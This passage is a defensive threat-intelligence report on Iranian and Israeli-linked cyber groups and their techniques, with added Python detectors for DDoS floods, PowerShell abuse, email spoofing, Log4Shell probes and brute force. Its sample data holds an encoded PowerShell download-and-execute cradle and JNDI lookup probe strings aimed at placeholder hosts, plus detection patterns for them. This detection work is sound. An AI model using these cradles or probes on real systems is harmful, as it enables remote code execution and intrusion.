Update: June 23, 2025
What to Know
The Department of Homeland Security has issued an advisory about low-level cyberattacks targeting US networks by pro-Iranian hacktivists. Threats to watch: distributed denial of service (DDoS), operational technology (OT) device exploits, and espionage targeting defense sectors.
Active groups so far include pro-Palestine group Handala, pro-Israel group "Predatory Sparrow," and pro-Iranian group "Team 313."
Recommendations to mitigate risk include incorporating DoS protection, disabling any non-essential services (especially those associated with OT), and conducting a thorough review of all public-facing authentication portals.
Earlier today, Iran's Islamic Revolutionary Guard Corps fired missiles targeting US military bases in Qatar and Iraq, a response to the United States' strike on three Iranian nuclear facilities yesterday, June 22. Yesterday's strikes marked an escalation point in the ongoing Israel–Iran conflict.
On the cyber front, state-aligned cybercrime groups have been ramping up their efforts as well, notably:
“Handala” Targets Multiple Israeli Organizations: The pro-Palestine hacking group Handala has listed several Israeli organizations on its data leak site beginning June 14, 2025. The group claims to have stolen over 2 terabytes of data from multiple Israeli firms, including a major oil and gas company.
“Predatory Sparrow” Targets Iranian Bank and Crypto Exchange: The pro-Israel cyber threat group Predatory Sparrow claimed responsibility for an attack on Iran's state-owned Bank Sepah on or around June 17, 2025. The group also claimed responsibility for an attack on Iran's cryptocurrency exchange Nobitex on or around June 18.
"Team 313" Takes Credit for Truth Social Outage: Earlier today, pro-Iranian activist group Team 313 claimed responsibility for a distributed denial-of-service (DDoS) attack on the Truth Social platform, citing the missile attacks on Iranian nuclear facilities as its motivation. This attribution has not yet been verified.
So far, the scope of the cyber conflict has been largely limited to participating countries, but following the United States' recent attacks, retaliation is highly likely in the near future (within one to four weeks), as Iranian officials have signaled intentions to respond. The Department of Homeland Security has issued an advisory warning about low-level cyberattacks targeting U.S. networks by pro-Iranian hacktivists, who are likely affiliated with the Iranian government.
Forecast
Iranian threats are expected to target organizations in the United States, particularly those conducting business with Israel or using Israeli equipment, such as programmable logic controllers (PLCs), through low-level attacks. Offensive operations will likely be carried out primarily by Iranian-affiliated hacktivist groups in the form of DDoS campaigns and by exploiting exposed operational technology (OT) devices. Targeted sectors are expected to face a mix of opportunistic attacks, which exploit organizations inadvertently exposing insecure OT devices, and deliberate denial-of-service attacks against entities or platforms involved in or supporting US efforts in the conflict.
High-impact cyberattacks designed to cause destruction are expected to coincide with kinetic operations to weaken a country's morale and disrupt its economy, similar to the attack conducted by Predatory Sparrow against Bank Sepah.
Additionally, Iran-backed groups (e.g., APT33) may target organizations that openly support war efforts against Iran, like an attack in 2014 that reportedly caused $40 million in damages to a Las Vegas casino after its CEO expressed support for stronger action against Iran. However, we anticipate that Iranian offensive cyber resources will likely focus on aligning with kinetic attacks against involved countries, prioritizing targets that advance their military objectives or enhance the effectiveness of their attacks, rather than expending resources on unrelated organizations.
Alongside complementing kinetic attacks against opposing countries, nation-backed threats (e.g., APT34) are likely to conduct espionage campaigns targeting organizations within or serving the defense and military sectors. The intent of these operations is to intercept strategic and tactical plans to aid in coordinating military actions and enhancing the effectiveness of offensive operations.
Recommendations
Utilize a comprehensive, multilayered strategy to mitigate DDoS attacks by incorporating cloud-based DoS protection, traffic filtering, rate limiting, load balancing, and web application firewalls to block malicious requests and handle large traffic volumes effectively.
Assess your organization's public-facing internet presence and disable any non-essential services, especially operational technology devices like human-machine interfaces (HMIs) and programmable logic controllers (PLCs).
Conduct a thorough review of all public-facing authentication portals, including admin consoles, web-based management interfaces, operational technology (OT) devices, and other exposed systems. Identify any instances of default or weak credentials and replace them with strong, unique passwords immediately.
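The rate limiting called for in the first recommendation is usually a token bucket per client: each source gets a burst allowance that refills at a fixed rate, and requests that find the bucket empty are dropped before they reach the application. The example below is added to this report and is not ReliaQuest code; the client addresses (TEST-NET ranges), the request timings and the bucket parameters are constructed for the demonstration.

```python
"""Token-bucket rate limiter of the kind placed in front of a public-facing
application to absorb request floods while leaving normal clients untouched.

Added example for this report; not ReliaQuest code. Client identifiers,
timestamps and bucket parameters below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Bucket:
    capacity: float     # burst allowance, in requests
    refill_rate: float  # sustained budget, in requests per second
    tokens: float       # tokens currently available
    updated: float      # timestamp of the last refill


class RateLimiter:
    def __init__(self, capacity: int = 10, refill_rate: float = 2.0) -> None:
        self.capacity = float(capacity)
        self.refill_rate = refill_rate
        self.buckets: dict[str, Bucket] = {}

    def _bucket(self, client: str, now: float) -> Bucket:
        bucket = self.buckets.get(client)
        if bucket is None:  # first sight of a client: start with a full bucket
            bucket = Bucket(self.capacity, self.refill_rate, self.capacity, now)
            self.buckets[client] = bucket
        return bucket

    def allow(self, client: str, now: float) -> bool:
        """Return True if the request at time `now` fits the client's budget."""
        bucket = self._bucket(client, now)
        elapsed = max(0.0, now - bucket.updated)
        # Refill proportionally to elapsed time, never beyond capacity.
        bucket.tokens = min(bucket.capacity, bucket.tokens + elapsed * bucket.refill_rate)
        bucket.updated = now
        if bucket.tokens >= 1.0:
            bucket.tokens -= 1.0
            return True
        return False


def simulate(requests, capacity: int = 10, refill_rate: float = 2.0) -> dict:
    """Replay (timestamp, client) requests and tally allowed/denied per client."""
    limiter = RateLimiter(capacity, refill_rate)
    tally = defaultdict(lambda: {"allowed": 0, "denied": 0})
    for ts, client in requests:
        outcome = "allowed" if limiter.allow(client, ts) else "denied"
        tally[client][outcome] += 1
    return dict(tally)


# Constructed traffic: one source sends 50 requests at t=0 and 10 more at t=3,
# while a normal client makes one request per second.
FLOOD = [(0.0, "203.0.113.10")] * 50 + [(3.0, "203.0.113.10")] * 10
NORMAL = [(float(i), "198.51.100.7") for i in range(5)]

if __name__ == "__main__":
    print(simulate(sorted(FLOOD + NORMAL)))
```

With a capacity of 10 and a refill of 2 requests per second, the flooding source gets its first 10 requests through, is denied the next 40, and three seconds later has earned only 6 more tokens; the normal client is never throttled. In production the same logic runs in the WAF or load balancer, and the per-client key is often the source address combined with the authenticated user or API key.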
Published April 25, 2025
Key Points
Escalated tensions between Iran and Israel could give rise to cyber threats.
Several advanced persistent threat (APT) groups are involved on both sides: APT34, APT35, and CyberAv3ngers in Iran, and Predatory Sparrow in Israel.
Iranian-affiliated APTs utilize a wide array of TTPs, including spearphishing and drive-by compromise, to significantly expand the attack surface for companies with ties to Israel or Israeli vendors.
At-risk organizations can take basic measures to protect themselves from these APT groups, including user training, regular patching, and network segmentation.
In early April 2024, Israel and Iran engaged in retaliatory airstrikes, which resulted in the death of military personnel on both sides and allegedly caused damage to military assets in both nations. While both Iran and Israel have recently expressed their intention to defuse the situation, tensions remain high. These tensions extend to international businesses and corporations that work within the Israeli or Iranian economy. APT groups affiliated with either nation have demonstrated their capacity to launch sophisticated cyber campaigns, targeting not just governmental institutions but also corporate entities. Cyber attacks motivated by this conflict could lead to data breaches, operational disruptions, and reputational damage to brands.
This report examines three prominent advanced persistent threat (APT) groups (APT34, APT35, and CyberAv3ngers) based in or linked to Iran, known for targeting Israel and its associated entities. Additionally, the report includes a concise overview of a group (Predatory Sparrow) focusing on Iranian targets that is believed to be connected to Israel. We also delve into the common tactics, techniques, and procedures (TTPs) these groups utilize and present key advice for detection and mitigation of these threats. This report is particularly valuable for organizations engaged in business with Iran or Israel or their vendors or suppliers.
Iranian Threats
Strategic deployment of APT and hacktivist groups is a key component of Iran’s cyber warfare tactics. These groups are often ideologically driven, aiming to gather intelligence and disrupt the normal functioning of critical infrastructure and corporate entities. By infiltrating networks through sophisticated spearphishing campaigns, exploiting zero-day vulnerabilities, and deploying bespoke malware, these groups can steal sensitive information, damage systems, and cripple financial operations, causing significant economic and reputational harm.
Israeli government and military organizations and companies in integral business industries like finance, energy, telecommunications, and technology are natural targets whose disruption could undermine Israel’s economic stability and international standing. However, the threat from Iranian APT and hacktivist groups also extends further:
For foreign companies that conduct business with Israel-based firms or that operate within Israel: Cyber attacks by Iran-linked groups on these companies could result in severe operational disruptions and financial losses. The outcomes may include data breaches, compromise of sensitive information, significant operational downtime, and possibly reputational damage that could impact the company in other markets globally.
For companies based outside Israel that use Israeli-based suppliers: If targeted by cyber attacks, these companies could face major supply-chain disruptions. The immediate effects could involve delays in product delivery, increased operational costs, and potentially a halt in production, affecting not just the directly targeted companies but also downstream customers relying on their products or services. Such a situation is especially concerning for companies or organizations that use operational technology (OT) to operate critical infrastructure, such as water treatment plants, electricity or other energy grids, and healthcare services.
For critical sector organizations in the US and UK: Targeted cyber attacks against these entities could severely disrupt essential services, including power, water, and healthcare systems. The strategic response from these nations, coupled with their technological and infrastructural significance, makes them prime targets for cyber operations with the intent of undermining their support for Israel. Such attacks could not only compromise public safety and national security but also provoke economic instability by disrupting critical infrastructure.
For companies operating in Middle Eastern countries that supported Israel’s response: Cyber attacks by Iran-linked groups carry substantial risks, given these countries’ strategic economic roles and geopolitical positions. In Jordan, cyber operations targeting the vital tourism and export sectors could lead to extensive economic repercussions amid an already dim economic outlook. The potential impact of such cyber attacks is even more significant in Saudi Arabia and the UAE, where attacks on oil and gas facilities could disturb global energy markets. Additionally, the UAE’s tech and finance sectors are liable to be prime targets for Iranian cyber attacks, which could erode investor confidence and inhibit innovation, affecting both the local economy and international investments.
This report profiles three Iranian-linked APT groups, outlining their tactics, techniques, and procedures (TTPs), while also providing customers with detection and mitigation strategies. APT34 is highlighted for its long-standing operations. APT35 is examined for its extensive campaigns against government, defense, and critical infrastructure entities in America, Europe, and the Middle East, utilizing spearphishing, social engineering, and bespoke malware. Lastly, the focus shifts to CyberAv3ngers, a group specializing in attacks on industrial control and operational technology systems, particularly through internet-connected programmable logic controllers (PLCs) and human-machine interfaces (HMI). This exploration emphasizes the growing convergence of IT and OT systems, underscoring the expanded attack surface and the internet as a prevalent entry point for cyber attacks.
APT34
The cyber espionage group APT34 (aka Twisted Kitten, Cobalt Gypsy, Crambus, Helix Kitten) focuses on infiltrating and conducting operations against high-value entities in the Middle East, including government bodies, critical infrastructure, telecommunications networks, and pivotal regional organizations. Its varied arsenal of techniques includes social engineering attacks via legitimate social networking sites, destructive operations using wiper malware, and exploiting trusted relationships to compromise supply chains. The following TTPs have featured prominently in many of the group’s campaigns.
T1566: Spearphishing Attachment
APT34 favors spearphishing to secure initial entry into target systems. The group employs social engineering tactics, often by attaching Microsoft Office or PDF documents laden with malware to its deceptive emails. To tackle the threat of spearphishing attacks, organizations should consider:
Educating employees on the risks of spearphishing attacks, emphasizing the importance of scrutinizing email attachments and links, even if they appear to come from legitimate sources.
Limiting user access rights within the organization to the minimum necessary to perform duties.
Deploying sophisticated email filtering solutions that can detect and quarantine emails containing malicious attachments or suspicious links, particularly those mimicking Microsoft Office or PDF formats.
T1059: Command and Scripting Interpreter: PowerShell
APT34 has exploited PowerShell-based backdoors in cyber attacks across the Middle East, leveraging PowerShell’s ostensibly legitimate capabilities to create fileless malware that leaves no on-disk traces. This method allows for complex operations within the operating system, data exfiltration, and lateral network movement. Continuous reloading of malicious code into memory also ensures attacker persistence within compromised systems. To mitigate this technique, organizations should:
Implement robust logging and monitoring of PowerShell activity to detect unusual or unauthorized commands that could indicate malicious behavior.
If PowerShell usage is essential, limit its execution policy solely to administrators. Using PowerShell JEA (Just Enough Administration) can also help confine administrative tasks by restricting the commands that admins or users can run during remote PowerShell sessions.
Regularly educate and train IT staff and system administrators on the potential misuse of PowerShell, including the latest tactics used by attackers, to better prepare them for identifying and mitigating such threats.
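The logging recommendation above only pays off if something evaluates the script blocks that PowerShell writes to event ID 4104. The detection below is added to this report and is not ReliaQuest code or a GreyMatter rule; it runs over constructed 4104 records reduced to the fields a detection would consume, decodes any -EncodedCommand argument (base64 of UTF-16LE text, as PowerShell expects) and then matches the decoded text as well, so that encoding does not hide a download cradle.

```python
"""Detection logic for PowerShell Script Block Logging (Windows event ID 4104),
covering the fileless tradecraft described above: encoded commands, download
cradles executed in memory, reflective assembly loading and hidden windows.

Added example for this report; not ReliaQuest code or a GreyMatter rule. The
event records are constructed and reduced to record id, host, user and script
text; the URL inside the encoded sample uses a TEST-NET address.
"""
from __future__ import annotations

import base64
import re

# -EncodedCommand and its abbreviations, followed by a base64 argument.
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

SUSPICIOUS_PATTERNS = [
    ("download-cradle", re.compile(r"Net\.WebClient|Invoke-WebRequest|DownloadString", re.I)),
    ("in-memory-execution", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("reflective-load", re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I)),
    ("hidden-window", re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I)),
    ("encoded-command", ENCODED_RE),
]


def decode_encoded_command(script: str) -> str | None:
    """Plaintext of an -EncodedCommand argument, or None if absent or invalid."""
    match = ENCODED_RE.search(script)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except ValueError:
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_script_block(script: str) -> list[str]:
    """Sorted labels triggered by the script text and by its decoded payload."""
    labels = {label for label, pattern in SUSPICIOUS_PATTERNS if pattern.search(script)}
    decoded = decode_encoded_command(script)
    if decoded:
        labels |= {label for label, pattern in SUSPICIOUS_PATTERNS
                   if label != "encoded-command" and pattern.search(decoded)}
    return sorted(labels)


def scan_events(events: list[dict]) -> dict[int, list[str]]:
    """Record id -> labels, for every event that triggers at least one label."""
    findings: dict[int, list[str]] = {}
    for event in events:
        labels = analyze_script_block(event["ScriptBlockText"])
        if labels:
            findings[event["RecordId"]] = labels
    return findings


# Constructed payload: the one-liner an encoded command would conceal.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.5/stage')"
SAMPLE_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed 4104 records
    {"RecordId": 1, "Host": "WS22", "User": "CORP\\jdoe",
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"RecordId": 2, "Host": "WS22", "User": "CORP\\jdoe",
     "ScriptBlockText": f"powershell.exe -NoProfile -W Hidden -enc {SAMPLE_ENCODED}"},
    {"RecordId": 3, "Host": "SRV07", "User": "CORP\\svc_web",
     "ScriptBlockText": "[System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, $null)"},
]

if __name__ == "__main__":
    for record_id, labels in scan_events(SAMPLE_EVENTS).items():
        print(record_id, labels)
```

The benign inventory command in record 1 produces nothing; record 2 is flagged for the encoded and hidden-window switches and, after decoding, for the cradle it carries; record 3 is flagged for reflective loading. Script block logging must be enabled through Group Policy (or the equivalent registry setting) before 4104 events exist to scan, and the same patterns apply to the decoded payloads that event ID 4688 command lines carry.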
T1078: Valid Accounts
APT34 infiltrates systems by using legitimate credentials obtained from phishing or other means, enabling it to move laterally within networks undetected. This method allows the group to discreetly explore and exfiltrate sensitive data. Compromised credentials can be used to circumvent access controls across network systems, allow persistent remote system access via services like virtual private networks (VPNs) and remote desktops, and may enable attackers to access restricted network areas or obtain elevated system privileges. Combat this tactic by:
Enforcing multifactor authentication (MFA) across all user accounts to add an additional layer of security, which can significantly reduce the risk of unauthorized access even if credentials are compromised.
Conducting frequent audits of user accounts and monitoring for unusual activity patterns.
Regularly educating and training IT staff and system administrators on the potential misuse of valid accounts, including the latest tactics used by attackers, to better prepare them for identifying and mitigating such threats.
APT35
Security researchers have linked APT35 (aka COBALT MIRAGE, PHOSPHORUS, G0059, NewsBeef, Charming Kitten, Magic Hound, TunnelVision, Ajax Security, Newscaster Team) to the Islamic Revolutionary Guard Corps (IRGC). APT35 conducts long-term, resource-intensive campaigns primarily targeting American, European, and Middle Eastern government, defense, and critical infrastructure organizations. APT35 primarily conducts cyber espionage using spearphishing, social engineering, and custom malware techniques; however, it has also exploited Microsoft BitLocker to encrypt targets’ data in exchange for ransom payments. Despite APT35’s adoption of diverse strategies, three specific TTPs are common vectors in its campaigns:
T1193: Spearphishing Attachment
In one notable example of this tactic in use, APT35 was linked with a phishing campaign that targeted an Israeli journalist, using a fake draft report as bait. This deceptive draft report came as a password-protected RAR file that embedded a harmful LNK file designed to deploy the “PowerStar” malware—a refined variant of its established backdoor named “CharmPower.”
The following recommendations can help defend against spearphishing.
Deploy data loss prevention (DLP) solutions to monitor and control data transfers, preventing sensitive information from being leaked or sent to unauthorized recipients.
Implement email authentication protocols such as Sender Policy Framework (SPF); DomainKeys Identified Mail (DKIM); and Domain-based Message Authentication, Reporting & Conformance (DMARC) to help detect and prevent email spoofing, making it harder for attackers to impersonate legitimate entities.
Conduct mock spearphishing campaigns to test employee awareness and preparedness, providing feedback and training as needed.
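SPF and DKIM on their own only authenticate the envelope sender or the signing domain; DMARC is what ties either result to the From header the recipient actually sees. The example below is added to this report and is not ReliaQuest code: it parses a constructed DMARC record, applies strict or relaxed alignment to constructed SPF and DKIM results, and returns the disposition a receiver would apply. Organizational domain is approximated as the last two labels, where a real receiver consults the Public Suffix List.

```python
"""DMARC evaluation as a receiving mail server performs it: parse the sending
domain's policy record, test SPF and DKIM alignment against the RFC5322.From
domain, and derive the disposition for a message that fails.

Added example for this report; not ReliaQuest code. The policy record, the
authentication results and all domain names are constructed. Organizational
domain is approximated as the last two labels; a real receiver uses the
Public Suffix List.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class AuthResults:
    from_domain: str   # domain of the RFC5322.From header
    spf_result: str    # "pass", "fail", "softfail", "none", ...
    spf_domain: str    # domain SPF was evaluated for (MAIL FROM, or HELO if empty)
    dkim_result: str
    dkim_domain: str   # d= tag of the validated DKIM signature ("" if none)


def parse_dmarc(record: str) -> dict[str, str]:
    """Parse a DMARC TXT record into its tags, applying the RFC 7489 defaults."""
    tags: dict[str, str] = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    tags.setdefault("pct", "100")
    return tags


def org_domain(domain: str) -> str:
    """Simplified organizational domain: the last two labels."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict ("s") alignment needs an exact match; relaxed ("r") needs the
    same organizational domain."""
    a, f = auth_domain.lower().rstrip("."), from_domain.lower().rstrip(".")
    if not a:
        return False
    return a == f if mode == "s" else org_domain(a) == org_domain(f)


def evaluate_dmarc(record: str, r: AuthResults) -> tuple[str, str]:
    """Return (dmarc_result, disposition); disposition is none/quarantine/reject."""
    policy = parse_dmarc(record)
    spf_aligned = r.spf_result == "pass" and aligned(r.spf_domain, r.from_domain, policy["aspf"])
    dkim_aligned = r.dkim_result == "pass" and aligned(r.dkim_domain, r.from_domain, policy["adkim"])
    if spf_aligned or dkim_aligned:
        return "pass", "none"
    # A subdomain in From falls under the sp= policy when the record carries one.
    is_subdomain = r.from_domain.lower() != org_domain(r.from_domain)
    disposition = policy["sp"] if is_subdomain and "sp" in policy else policy["p"]
    return "fail", disposition


POLICY_RECORD = ("v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; "
                 "rua=mailto:dmarc-reports@example.com")   # constructed record

SAMPLE_MESSAGES = {  # constructed authentication outcomes for three messages
    "legitimate": AuthResults("example.com", "pass", "bounce.example.com", "pass", "example.com"),
    "spoofed": AuthResults("example.com", "pass", "lookalike-example.test", "none", ""),
    "subdomain-strict-dkim": AuthResults("news.example.com", "fail", "news.example.com", "pass", "example.com"),
}

if __name__ == "__main__":
    for name, results in SAMPLE_MESSAGES.items():
        print(name, evaluate_dmarc(POLICY_RECORD, results))
```

The spoofed message passes SPF for the attacker's own domain yet fails DMARC because that domain does not align with the From header, which is exactly the gap DMARC closes. The third message shows a common self-inflicted failure: a legitimate subdomain newsletter signed with the parent domain's DKIM key is rejected under adkim=s, so alignment mode has to be chosen with the organization's own mail flows in mind.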
T1189: Drive-by Compromise
APT35 has used drive-by compromise techniques in its campaigns against Israel’s transportation, logistics, and technology sectors. The group has strategically manipulated legitimate websites to divert visitors to attacker-managed sites designed to phish for personal information and credentials. Once collected, this data is transmitted to a predefined domain for use in subsequent attacks. Recommended protective strategies include:
Ensure that all web applications are up to date with the latest security patches to minimize vulnerabilities that could be exploited in drive-by compromise attacks.
Use web filtering solutions to block known malicious sites and monitor web traffic for unusual redirections or attempts to access phishing sites.
Regularly educate employees about the risks of drive-by compromises and train them to recognize phishing attempts, emphasizing the importance of not entering personal information or credentials on unfamiliar websites.
T1595: Active Scanning: Vulnerability Scanning
APT35 has conducted extensive scans to pinpoint public systems susceptible to specific vulnerabilities, including CVE-2021-44228 in Log4j, the ProxyShell set of vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in on-premises Microsoft Exchange Servers, and CVE-2018-13379 in Fortinet FortiOS Secure Sockets Layer (SSL) VPNs. Organizations should consider:
Ensuring that all web applications, especially critical software such as VPNs, are up to date with the latest security patches to minimize vulnerabilities that could be exploited by threat actors using active scanning techniques.
Dividing network resources into segments to reduce the attack surface and closely monitoring traffic for unusual patterns that could indicate a scanning attempt or exploitation.
Applying strict access controls and authentication measures to all users and devices, limiting the potential impact of exploited vulnerabilities.
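The traffic monitoring recommended above is concrete for the Log4j case: a scanning campaign leaves JNDI lookup strings in request lines, referers and user agents. The detector below is added to this report and is not ReliaQuest code or a GreyMatter rule; it goes slightly beyond a literal string match by URL-decoding each field and unwrapping single-character case lookups before matching, which is what keeps the check effective against trivially encoded probes. The log lines are constructed in Combined Log Format with TEST-NET addresses.

```python
"""Detection of Log4Shell (CVE-2021-44228) lookup probes in web server access
logs. Request line, referer and user agent are URL-decoded and normalised
before matching so that case changes and ${lower:}/${upper:} wrapping do not
defeat the check.

Added example for this report; not ReliaQuest code or a GreyMatter rule. The
log lines are constructed in Combined Log Format with TEST-NET addresses.
"""
from __future__ import annotations

import re
from collections import Counter
from urllib.parse import unquote

ACCESS_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
CASE_WRAPPER_RE = re.compile(r"\$\{(?:lower|upper):(.)\}", re.I)
JNDI_RE = re.compile(r"\$\{jndi:", re.I)


def normalise(field: str) -> str:
    """Undo two layers of URL encoding and strip single-character case lookups."""
    text = unquote(unquote(field))
    previous = None
    while previous != text:  # wrappers may nest, so iterate to a fixed point
        previous, text = text, CASE_WRAPPER_RE.sub(r"\1", text)
    return text


def is_jndi_probe(fields: dict[str, str]) -> bool:
    """True if any attacker-controlled field carries a JNDI lookup after normalisation."""
    return any(JNDI_RE.search(normalise(fields[key])) for key in ("req", "ref", "ua"))


def scan_access_log(lines) -> Counter:
    """Count JNDI lookup probes per source address."""
    hits: Counter = Counter()
    for line in lines:
        match = ACCESS_RE.match(line)
        if match and is_jndi_probe(match.groupdict()):
            hits[match["ip"]] += 1
    return hits


SAMPLE_LOG = [  # constructed access log lines
    '198.51.100.7 - - [10/Apr/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Apr/2024:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - [10/Apr/2024:12:00:03 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.5%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.5 - - [10/Apr/2024:12:00:04 +0000] "GET /login HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for source, count in scan_access_log(SAMPLE_LOG).items():
        print(source, count)
```

Two of the four lines are probes from the same source, one of them URL-encoded and wrapped; the normal browsing traffic is untouched. Counting per source rather than alerting per line is what turns this into the scanning signal the recommendation describes, and a 404 on a probe is not reassurance: the lookup fires when the string is logged, not when the page exists.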
CyberAv3ngers
Active since 2020, CyberAv3ngers (aka CyberAveng3rs and Cyber Avengers) has been linked with the IRGC. CyberAv3ngers is a politically motivated group that primarily targets industrial control systems, OT, or critical infrastructure using programmable logic controllers (PLCs) and human machine interfaces (HMI) connected to the internet. On November 22, 2023, CyberAv3ngers carried out a successful cyber attack on multiple water and wastewater facilities in the US that were employing PLCs with HMIs built in Israel. The group likely gained access by exploiting internet-connected devices that were protected by default passwords. Public information on CyberAv3ngers’ TTPs is limited, but security researchers have highlighted its distinctive use of brute-force techniques.
T1110: Brute Force
Adversaries may use brute-force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. In the case of the CyberAv3ngers attack on water and wastewater facilities in the US, the attackers employed scanning tools to pinpoint accessible internet-connected devices. Subsequently, they gained entry by utilizing the default PLC credentials, which are often readily available in OT manuals available online. To protect against brute-force techniques, organizations should:
Immediately update default usernames and passwords for all OT devices to unique, strong credentials to prevent unauthorized access.
Implement routine scanning of networked devices to identify and secure internet-facing devices that may be vulnerable to unauthorized access.
Enhance network security measures by employing firewalls, VPNs, and network segmentation to limit the exposure of critical OT devices to the internet.
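Default credentials on an exposed HMI are found by guessing, and guessing shows up in the device's authentication log long before the successful logon does. The detector below is added to this report and is not ReliaQuest code: it keeps a sliding window of failed logons per source address, alerts when the count crosses a threshold, and raises a separate alert when a success arrives from a source that has just produced that burst, which is the pattern of a guessed or default password. The log format, host name and addresses are constructed; real PLC and HMI logs vary by vendor.

```python
"""Brute-force detection over authentication logs from an internet-facing HMI:
a sliding window counts failed logons per source address, and a success that
follows a burst of failures from the same source is raised separately.

Added example for this report; not ReliaQuest code. The log format, host name
and addresses are constructed; real PLC/HMI logs vary by vendor.
"""
from __future__ import annotations

import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"(?P<ts>\S+) (?P<host>\S+) auth: result=(?P<result>\w+) user=(?P<user>\S+) src=(?P<src>\S+)"
)


def detect_bruteforce(lines, threshold: int = 5, window_seconds: int = 60) -> list[tuple]:
    """Return alerts as (kind, src, user, timestamp) tuples.

    kind is "brute-force" when failures from one source reach `threshold`
    within the window, and "success-after-failures" when a success arrives
    while the window still holds at least `threshold` failures from that source.
    """
    window = timedelta(seconds=window_seconds)
    failures: dict[str, deque] = defaultdict(deque)
    alerts = []
    for line in lines:
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # unparsable line; a production parser would count these too
        ts = datetime.fromisoformat(match["ts"])
        src, user, result = match["src"], match["user"], match["result"]
        recent = failures[src]
        while recent and recent[0] < ts - window:
            recent.popleft()  # drop failures that have aged out of the window
        if result == "fail":
            recent.append(ts)
            if len(recent) == threshold:  # alert once, when the threshold is crossed
                alerts.append(("brute-force", src, user, ts.isoformat()))
        elif result == "success" and len(recent) >= threshold:
            alerts.append(("success-after-failures", src, user, ts.isoformat()))
    return alerts


SAMPLE_LOG = [  # constructed HMI authentication log
    "2024-04-10T09:00:00 hmi-01 auth: result=fail user=admin src=203.0.113.9",
    "2024-04-10T09:00:10 hmi-01 auth: result=fail user=admin src=203.0.113.9",
    "2024-04-10T09:00:20 hmi-01 auth: result=fail user=admin src=203.0.113.9",
    "2024-04-10T09:00:30 hmi-01 auth: result=fail user=admin src=203.0.113.9",
    "2024-04-10T09:00:40 hmi-01 auth: result=fail user=admin src=203.0.113.9",
    "2024-04-10T09:00:50 hmi-01 auth: result=fail user=admin src=203.0.113.9",
    "2024-04-10T09:01:00 hmi-01 auth: result=success user=admin src=203.0.113.9",
    "2024-04-10T09:05:00 hmi-01 auth: result=fail user=operator src=10.0.5.20",
    "2024-04-10T09:05:30 hmi-01 auth: result=success user=operator src=10.0.5.20",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(*alert)
```

The external source trips the threshold on its fifth failure and is flagged again when the sixth failure is followed by a success; the internal operator who mistypes once is not. The second alert kind is the one to page on, because it means the exposed account is now in use, and the immediate response is the first recommendation above: change the credential and take the device off the internet.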
Israeli Threats
The full extent of Israel’s cyber offensive capabilities is largely speculative: Cybersecurity research and intelligence analysis has hypothesized about Israel’s cyber activities, but the Israeli government does not admit to engaging in offensive cyber operations through affiliated entities. This approach helps to keep cyber warfare tactics confidential, minimize diplomatic fallout, and maintain plausible deniability in the international arena. Hypothetically, Israeli cyber initiatives targeting Iran would be motivated by a desire to thwart Iran’s nuclear plans, collect vital intelligence, and bolster national security through the proactive neutralization of threats. Thereby, in targeting Iran, Israeli cyber groups might focus on critical sectors, such as defense and nuclear research, alongside communication and financial systems. Such attacks would aim to strategically weaken Iran’s capabilities and apply economic strain.
Organizations should remain vigilant about the potential repercussions of Israeli cyber activities against Iranian interests. Such actions could provoke retaliatory cyber attacks from Iranian actors, not only against Israeli entities but also against international businesses perceived to have business ties with Israeli companies. These tit-for-tat attacks could expose these organizations to data breaches, operational disruptions, and compromise of sensitive information. Understanding this dynamic is vital for businesses to prepare and strengthen their cybersecurity defenses, anticipating the broader implications of geopolitical tensions manifesting in the cyber realm. This awareness is especially important for entities with ties to Israel, as they may inadvertently become targets in the escalating cyber conflict between these nations.
In light of these conditions, the following section of the report covers a prominent Israel-linked group that has focused on targeting Iranian critical infrastructure.
Predatory Sparrow
